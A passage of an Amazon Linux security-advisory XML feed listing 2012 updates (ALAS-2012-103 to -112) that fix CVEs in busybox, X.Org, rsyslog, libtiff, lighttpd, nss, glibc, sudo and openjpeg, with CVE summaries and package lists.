release="8.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.3-8.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-103</id><title>Amazon Linux - ALAS-2012-103: low priority package update for busybox</title><issued date="2012-07-05 16:23:00" /><updated date="2014-09-14 16:43:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2716:
The BusyBox DHCP client, udhcpc, did not sufficiently sanitize certain options provided in DHCP server replies, such as the client hostname. A malicious DHCP server could send such an option with a specially-crafted value to a DHCP client. If this option's value was saved on the client system, and then later insecurely evaluated by a process that assumes the option is trusted, it could lead to arbitrary code execution with the privileges of that process. Note: udhcpc is not used on Red Hat Enterprise Linux by default, and no DHCP client script is provided with the busybox packages.
CVE-2006-1168:
The decompress function in compress42.c in (1) ncompress 4.2.4 and (2) liblzw allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code, via crafted data that leads to a buffer underflow.
A buffer underflow flaw was found in the way the uncompress utility of BusyBox expanded certain archive files compressed using Lempel-Ziv compression. If a user were tricked into expanding a specially-crafted archive file with uncompress, it could cause BusyBox to crash or, potentially, execute arbitrary code with the privileges of the user running BusyBox.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1168" title="" id="CVE-2006-1168" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2716" title="" id="CVE-2011-2716" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0810.html" title="" id="RHSA-2012:0810" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="busybox" version="1.19.3" release="2.11.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.19.3-2.11.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.11.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.19.3-2.11.amzn1.i686.rpm</filename></package><package name="busybox" version="1.19.3" release="2.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.19.3-2.11.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.11.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.19.3-2.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-104</id><title>Amazon Linux - ALAS-2012-104: low priority package update for xorg-x11-server</title><issued date="2012-07-05 16:24:00" /><updated date="2014-09-14 16:44:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4029:
The LockServer function in os/utils.c in X.Org xserver before 1.11.2 allows local users to change the permissions of arbitrary files to 444, read those files, and possibly cause a denial of service (removed execution permission) via a symlink attack on a temporary lock file.
A race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information.
745024:
CVE-2011-4029 xorg-x11-server: lock file chmod change race condition
CVE-2011-4028:
A flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4028" title="" id="CVE-2011-4028" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4029" title="" id="CVE-2011-4029" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0939.html" title="" id="RHSA-2012:0939" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="xorg-x11-server-common" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.10.6" release="1.12.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.10.6" release="1.12.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.10.6-1.12.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.10.6-1.12.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.10.6" release="1.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.10.6-1.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-105</id><title>Amazon Linux - ALAS-2012-105: medium priority package update for rsyslog</title><issued date="2012-07-06 16:04:00" /><updated date="2014-09-14 16:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4623:
Integer overflow in the rsCStrExtendBuf function in runtime/stringbuf.c in the imfile module in rsyslog 4.x before 4.6.6, 5.x before 5.7.4, and 6.x before 6.1.4 allows local users to cause a denial of service (daemon hang) via a large file, which triggers a heap-based buffer overflow.
A numeric truncation error, leading to a heap-based buffer overflow, was found in the way the rsyslog imfile module processed text files containing long lines. An attacker could use this flaw to crash the rsyslogd daemon or, possibly, execute arbitrary code with the privileges of rsyslogd, if they are able to cause a long line to be written to a log file that rsyslogd monitors with imfile. The imfile module is not enabled by default.
769822:
CVE-2011-4623 rsyslog: DoS due integer signedness error while extending rsyslog counted string buffer
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4623" title="" id="CVE-2011-4623" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0796.html" title="" id="RHSA-2012:0796" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rsyslog-gssapi" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-mysql-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-debuginfo-5.8.10-2.17.amzn1.i686.rpm</filename></package><package name="rsyslog-pgsql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-pgsql-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-snmp-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gnutls-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-debuginfo" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-debuginfo-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-mysql" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-mysql-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-5.8.10-2.17.amzn1.x86_64.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rsyslog-gssapi-5.8.10-2.17.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-106</id><title>Amazon Linux - ALAS-2012-106: important priority package update for libtiff</title><issued date="2012-07-06 16:18:00" /><updated date="2014-09-14 16:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2113:
Multiple integer overflows in tiff2pdf in libtiff before 4.0.2 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the tiff2pdf tool. An attacker could use these flaws to create a specially-crafted TIFF file that would cause tiff2pdf to crash or, possibly, execute arbitrary code.
810551:
CVE-2012-2113 libtiff: integer overflow in tiff2pdf leading to heap-buffer overflow when reading a tiled tiff file
CVE-2012-2088:
libtiff did not properly convert between signed and unsigned integer values, leading to a buffer overflow. An attacker could use this flaw to create a specially-crafted TIFF file that, when opened, would cause an application linked against libtiff to crash or, possibly, execute arbitrary code.
Integer signedness error in the TIFFReadDirectory function in tif_dirread.c in libtiff 3.9.4 and earlier allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a negative tile depth in a tiff image, which triggers an improper conversion between signed and unsigned types, leading to a heap-based buffer overflow.
832864:
CVE-2012-2088 libtiff: Type conversion flaw leading to heap-buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2088" title="" id="CVE-2012-2088" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2113" title="" id="CVE-2012-2113" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1054.html" title="" id="RHSA-2012:1054" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libtiff-devel" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="6.10.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-3.9.4-6.10.amzn1.i686.rpm</filename></package><package name="libtiff" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-3.9.4-6.10.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="3.9.4" release="6.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-3.9.4-6.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-107</id><title>Amazon Linux - ALAS-2012-107: medium priority package update for lighttpd</title><issued date="2012-07-09 14:20:00" /><updated date="2014-09-14 16:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4362:
Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.
758624:
CVE-2011-4362 lighttpd: Out of bounds read due to a signedness error (DoS, crash)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4362" title="" id="CVE-2011-4362" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="lighttpd-fastcgi" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.2.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.31-1.2.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.31" release="1.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-108</id><title>Amazon Linux - ALAS-2012-108: medium priority package update for nss</title><issued date="2012-07-25 17:55:00" /><updated date="2014-09-14 16:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-0441:
The ASN.1 decoder in the QuickDER decoder in Mozilla Network Security Services (NSS) before 3.13.4, as used in Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10, allows remote attackers to cause a denial of service (application crash) via a zero-length item, as demonstrated by (1) a zero-length basic constraint or (2) a zero-length field in an OCSP response.
A flaw was found in the way the ASN.1 (Abstract Syntax Notation One) decoder in NSS handled zero length items. This flaw could cause the decoder to incorrectly skip or replace certain items with a default value, or could cause an application to crash if, for example, it received a specially-crafted OCSP (Online Certificate Status Protocol) response.
827833:
CVE-2012-0441 nss: NSS parsing errors with zero length items
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0441" title="" id="CVE-2012-0441" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1091.html" title="" id="RHSA-2012:1091" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nss" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.13.5" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.13.5-1.26.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.13.5-1.26.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.13.5" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.13.5-1.26.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-109</id><title>Amazon Linux - ALAS-2012-109: medium priority package update for glibc</title><issued date="2012-07-25 17:56:00" /><updated date="2014-09-14 16:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3406:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
It was discovered that the formatted printing functionality in glibc did not properly restrict the use of alloca(). This could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
826943:
CVE-2012-3406 glibc: printf() unbound alloca() usage in case of positional parameters + many format specs
CVE-2012-3405:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
833704:
CVE-2012-3405 glibc: incorrect use of extend_alloca() in formatted printing can lead to FORTIFY_SOURCE format string protection bypass
CVE-2012-3404:
Multiple errors in glibc's formatted printing functionality could allow an attacker to bypass FORTIFY_SOURCE protections and execute arbitrary code using a format string flaw in an application, even though these protections are expected to limit the impact of such flaws to an application abort.
833703:
CVE-2012-3404 glibc: incorrect size calculation in formatted printing can lead to FORTIFY_SOURCE format string protection bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3404" title="" id="CVE-2012-3404" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3405" title="" id="CVE-2012-3405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3406" title="" id="CVE-2012-3406" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1098.html" title="" id="RHSA-2012:1098" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="glibc-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="nscd" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.40.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.12-1.80.40.amzn1.i686.rpm</filename></package><package name="glibc" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.12-1.80.40.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.12" release="1.80.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.12-1.80.40.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-110</id><title>Amazon Linux - ALAS-2012-110: medium priority package update for sudo</title><issued date="2012-07-25 18:00:00" /><updated date="2014-09-14 16:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2337:
sudo 1.6.x and 1.7.x before 1.7.9p1, and 1.8.x before 1.8.4p5, does not properly support configurations that use a netmask syntax, which allows local users to bypass intended command restrictions in opportunistic circumstances by executing a command on a host that has an IPv4 address.
A flaw was found in the way the network matching code in sudo handled multiple IP networks listed in user specification configuration directives. A user, who is authorized to run commands with sudo on specific hosts, could use this flaw to bypass intended restrictions and run those commands on hosts not matched by any of the network specifications.
820677:
CVE-2012-2337 sudo: Multiple netmask values used in Host / Host_List configuration cause any host to be allowed access
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2337" title="" id="CVE-2012-2337" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1081.html" title="" id="RHSA-2012:1081" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="sudo-debuginfo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.7.4p5-12.14.amzn1.i686.rpm</filename></package><package name="sudo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.7.4p5-12.14.amzn1.i686.rpm</filename></package><package name="sudo-debuginfo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.7.4p5-12.14.amzn1.x86_64.rpm</filename></package><package name="sudo" version="1.7.4p5" release="12.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.7.4p5-12.14.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-111</id><title>Amazon Linux - ALAS-2012-111: important priority package update for openjpeg</title><issued date="2012-07-30 16:35:00" /><updated date="2014-09-14 16:47:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-3358:
Multiple heap-based buffer overflows in the j2k_read_sot function in j2k.c in OpenJPEG 1.5 allow remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted (1) tile number or (2) tile length in a JPEG 2000 image file.
An input validation flaw, leading to a heap-based buffer overflow, was found in the way OpenJPEG handled the tile number and size in an image tile header. A remote attacker could provide a specially-crafted image file that, when decoded using an application linked against OpenJPEG, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
835767:
CVE-2012-3358 openjpeg: heap-based buffer overflow when processing JPEG2000 image files
CVE-2009-5030:
The tcd_free_encode function in tcd.c in OpenJPEG 1.3 through 1.5 allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via crafted tile information in a Gray16 TIFF image, which causes insufficient memory to be allocated and leads to an "invalid free."
OpenJPEG allocated insufficient memory when encoding JPEG 2000 files from input images that have certain color depths. A remote attacker could provide a specially-crafted image file that, when opened in an application linked against OpenJPEG (such as image_to_j2k), would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
812317:
CVE-2009-5030 openjpeg: Heap memory corruption leading to invalid free by processing certain Gray16 TIFF images
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5030" title="" id="CVE-2009-5030" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3358" title="" id="CVE-2012-3358" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1068.html" title="" id="RHSA-2012:1068" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openjpeg" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-devel-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-libs-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="8.5.amzn1" epoch="0" arch="i686"><filename>Packages/openjpeg-debuginfo-1.3-8.5.amzn1.i686.rpm</filename></package><package name="openjpeg-debuginfo" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-debuginfo-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg-libs" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-libs-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-1.3-8.5.amzn1.x86_64.rpm</filename></package><package name="openjpeg-devel" version="1.3" release="8.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/openjpeg-devel-1.3-8.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-112</id><title>Amazon Linux - ALAS-2012-112: medium priority package update for perl-DBD-Pg</title><issued date="2012-08-03 13:50:00" /><updated date="2014-09-14 16:48:00" /><severity>medium</severity><description>Package updates are available for Amazon 